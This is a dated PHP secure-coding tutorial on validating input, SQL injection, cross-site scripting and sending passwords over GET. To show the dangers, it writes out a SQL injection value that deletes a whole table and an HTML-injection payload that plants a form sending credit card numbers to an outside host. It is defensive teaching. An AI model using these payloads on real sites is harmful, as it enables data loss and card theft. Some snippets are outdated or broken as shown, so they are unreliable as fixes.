Trust is everything in this day and age. You have to trust
a lot of people, from the guy who gives you directions to your
local plumber. After all, you're not always the authority. However, when
developing applications for the web, you must assume the
role of authority. Otherwise, the user will assume the role, which is a big gamble:
total data integrity, data corruption, or diversion of data -- if the
user is the authority, you don't know what the results will be.
We blame a lot of problems on "bad code". However, bad code isn't
necessarily written with malicious intent; good code can go bad through simple
misunderstandings and misuse of technologies. Three basic
steps can be taken to avoid creating bad code. The first step is
ensuring that you can trust your input. The next step is manipulating that input
data carefully. The final step is providing the appropriate people with
secure, reliable access to that data.
Verify That Your Input Is Correct
Never trust the input you receive from someone else. You want your data to
have perfect integrity, within the limits that you establish. If you
write a routine that saves someone's address to your
database, don't trust your routine to magically fix user error. Only you can make that happen.
Lets write some quick code to save those addresses:
<?php
function saveAddress($dbh,$firstName,$lastName,$streetAddress,$city,$zip) {
$stmt=OCIPrepare($dbh,"
Insert into addressBook
(firstName,lastName,streetAddress,city,zip)
values
('$firstName','$lastName','$streetAddress','$city','$zip')");
OCIExecute($stmt);
}
?>
So what happens if someone leaves the ZIP code out?
What if they put "pr0nd00d" as their ZIP code? Do not trust your input.
Some might argue that these checks should be done before this function.
Well, what if your co-worker, Billy Bob, reuses this function? Now he
has to do the checks too. And don't trust he'll do it, either. Billy
Bob is a lazy man, and not too smart in the first place.
So let's define a function to make sure the ZIP code is right. After
all, my zip code is not "I like cheese."
<?php
function validZipCode($zip) {
return(ereg("^[[:digit:]]{5}(-[[:digit:]]{4})?$",$zip));
}
?>
The validZipCode() function takes a zip code and does a regular
expression match against it. If it $zip begins with 5 digits, with an optional
dash and 4 digit extension, return 1. Else return 0. Now, l
ets integrate
it with our current function.
<?php
function saveAddress($dbh,$firstName,$lastName,$streetAddress,$city,$zip) {
if(!validZipCode($zip))
return(0);
$stmt=OCIPrepare($dbh,"
Insert into addressBook
(firstName,lastName,streetAddress,city,zip)
values
('$firstName','$lastName','$streetAddress','$city','$zip')");
OCIExecute($stmt);
Return(1);
}
?>
Now our current function requires a valid ZIP code. It won't accept a
blank one, nor a non-USA one. (Note that our function doesn't simply
require a non-blank string -- that would be A Bad Thing(tm).) If
a ZIP isn't passed, our function returns a 0. But wait...we can reword
the logic so that when valid ZipCode() returns a 0, an array or string
can be returned with a more descriptive error.
<?php
If(!validZipCode($zip))
push_array($errors,"Invalid zip code.");
If(!validStreetAddress($streetAddress))
push_array($errors,"Invalid address.");
?>
Etc...
Adding the validation functions is an exercise left to the user. Some things may not be
economically or technologically feasible,
as you cannot always afford to verify information beyond a certain point.
For example, it would be too slow to confirm every bit of the input from the
one hundred addresses per second you get. However, a simple check like the one
outlined above, makes it MUCH harder to have data that
doesn't make sense. After all, we know that valid U.S. ZIP
codes are numeric and how long they can be, so why accept data that's
obviously wrong?
Manipulating Your Input
This is a more subtle problem for those who may not fully understand
every detail of what they are doing. Good data manipulation is a matter
of watching what you do and how you do it, because this is where
hackers and crackers can have a field day.
In our original function, there is a statement:
<?php
OCIPrepare($dbh,"
Insert into addressBook
(firstName,lastName,streetAddress,city,zip)
values
('$firstName','$lastName','$streetAddress','$city','$zip')");
?>
Bob O'Connor is a candidate to have his address saved in our table
address book. The string in which the SQL is parsed now contains "...
('Bob','O'Connor', ...." You may see the error now. That single quote in
"O'Connor" needs to be escaped. The oracle way is to turn "O'Connor"
into "O''Connor", by replacing all single apostrophes with two
apostrophes.
Bob O'Connor probably doesn't care how you deal with this situation,
but let's think about the hacker and/or cracker who will love you for a
statement like:
delete from addressBook where lastName=$lastname
What if $lastname="'' or 1"? Now our statement looks like:
delete from addressBook where lastName='' or 1
Everything out of your address book has now successfully been deleted. It is now time to
break out the 40gig backup tapes.
Just because one language (like PHP) can take your input without a
problem, don't assume that another language (like SQL) will happily accept the same
input. This is not a matter of coding for what you want to
happen: it is a matter of coding for what you don't want to happen.
Escape your characters if you are using more than one language interpreter.
If you are using PHP to evaluate dynamic PHP via eval(), don't assume
that the variables you use to construct the dynamic PHP will be
sane.
One more example. Here's a simple piece of HTML and PHP which does
something neat.
<?php
if($CC) {
save($CC);
header("Location: <https://www.mystore.com/my.php>");
exit();
}
?>
<form method="post" action="my.php">
Input your CC number to pay for your purchase.<br>
<input type="text" name="CC" value="<?php echo $CC; ?>"><br>
<input type="submit" value="Show me the money!">
</form>
A piece of code to save your credit card number, but with one faux pas:
I didn't check to be sure $CC is valid before trying to save! But
save($CC) should check to make sure it's getting valid input, as well.
Let's assume the spec for save($CC) is: if the $CC is valid, it is saved;
else, an error is returned. So let's change our code to correspond
with that spec.
<?php
if(save($CC)) {
header("Location: ....");
exit;
}
?>
So now if $CC is invalid, our little input tag does something cool. It
lets the user see and correct his mistake!
<input type="text" name="CC" value="<?php echo $CC; ?>">
Remember what I said about coding in one language to output to another?
This example is vulnerable to cross-site scripting. (This is when you
input your own script code as input to another program and the result
returned is a page that now does something else -- something the
programmer never intended.) A hacker/cracker might input the following for
$CC...watch the exact characters used:
"></form><form action=<http://www.mycompetitor.com/haha.cgi>>
Input your CC again for validation purposes:
<input name="CC"><input type=submit></form><!-
Don't worry how the person managed to fit all of this into our
program. Now our web page will look like this after PHP gets to it:
<form method="post" action="my.php">
Input your CC number to pay for your purchase.
<input type="text" name="CC" value=""></form><form
action=<http://www.mycompetitor.com/haha.cgi>>Input your CC again for validation
purposes: <input name="CC"><input type=submit></form><!-">
<input type="submit" value="Show me the money!">
</form>
This is a very simple hack and slash example, but our page will now
have two input fields. The first goes nowhere since the submit button
isn't within the <form></form> tags. The second sends the credit card
number to another site! The rest of the HTML is blanked out after the
second closing form tag. A quick and nasty hack, eh? We can beautify this
further, but the point here is to show that you should never trust your input. HTML
is taking input from PHP.
How to prevent this? A line before or during printing:
<?php
$CC=ereg_replace("\"",""",$CC);
?>
Now if some evil person tries the above malicious code, or even a
simple:
"><input type="submit" value="DIE!
This will output:
<form method="post" action="my.php">
Input your CC number to pay for your purchase.
<input type="text" name="CC" value=""><input
type="submit" value="DIE!">
<input type="submit" value="Show me the money!">
</form>
Annoying to anyone who views it? Yes. Dangerous to your customers?
Definitely not. The value in the input field is practically garbage. In
fact, you might get a phone call about someone at haha@malicious.com
</ym/Compose?To=haha@malicious.com&YY=7178&order=down&sort=date&pos=0>
sending you such things. What you do to Mr. "haha" is entirely up to
you.
How To Access Your Data
Now all your code is cross-script proof and saving proper data.
Time to make your site public, right? This is another time where you
should think twice. For example, your customers are logging into your site to use
your two-click purchase (patent pending) fork-in-a-box (patent pending)
e-commerce site. You do one of these for a front page:
<form method="get" action="account.php">
ID: <input type="text" name="id">
Password: <input type="password" name="password">
</form>
See the first problem? To submit to your account page, a URL is
constructed to pass the variables, like so:
<http://www.forkinabox.com/account.php?id=me&password=ilikecheese>
In the worst case scenario, the password is sent in plain text, saved
in the browser's history, sent to a proxy and saved in the proxy log,
and saved in the webserver's access log. Using the POST method
makes things a little (not much) more secure, but someone who is
persistent enough can even fake a form using the POST method.
Since we are using the GET method to get the variables into PHP in the
prior example, anyone can try an infinite number of IDs and passwords.
(Microsoft suffered this one with their passport system a while back.)
Instead of GET, use $HTTP_POST_VARS[] for information that is vital for
access or needs to be secure for other reasons. The rest of the time
you can use the GET method -- most of the time a search term doesn't
have to be kept secret.
Since it is possible for someone in the network to be sniffing for
clear-text (non-encrypted) data, using https (SSL) will encrypt the remaining data to make
it more secure. It is possible to break this kind of
encryption, but at present it takes someone with a lot of
computing power to decrypt your data and fake input to your forms. [Insert
your favorite conspiracy theory here.]
But let's say that we want to be slick and bypass PHP. (That's the
reason why we're writing bad code, no?) Checking with JavaScript for
valid input or even a valid user and password has been done. But then what
happens when I turn off JavaScript?
Don't depend on JavaScript for anything more important than user
convenience. You can cache data with it, make pretty things with it, use it to do
fast checks for invalid data, but don't depend on JavaScript to get
proper input to your server. As soon as the user turns it off,
your authentication and data checking are out the door. You can
speed up the data checking and shave some processing time off the server,
but, users can turn it off. I know I do!
This article may be in three parts, but it has one point in mind:
Never trust anything that you don't have control over. Don't trust the
input to your functions, the data used to generate pages, nor the
network. This means check your input when it comes in, clean the input for
further use, and access it in a sane (and maybe even secure) fashion.
The more authority you take, the less chance the user can be malicious.
-- Spencer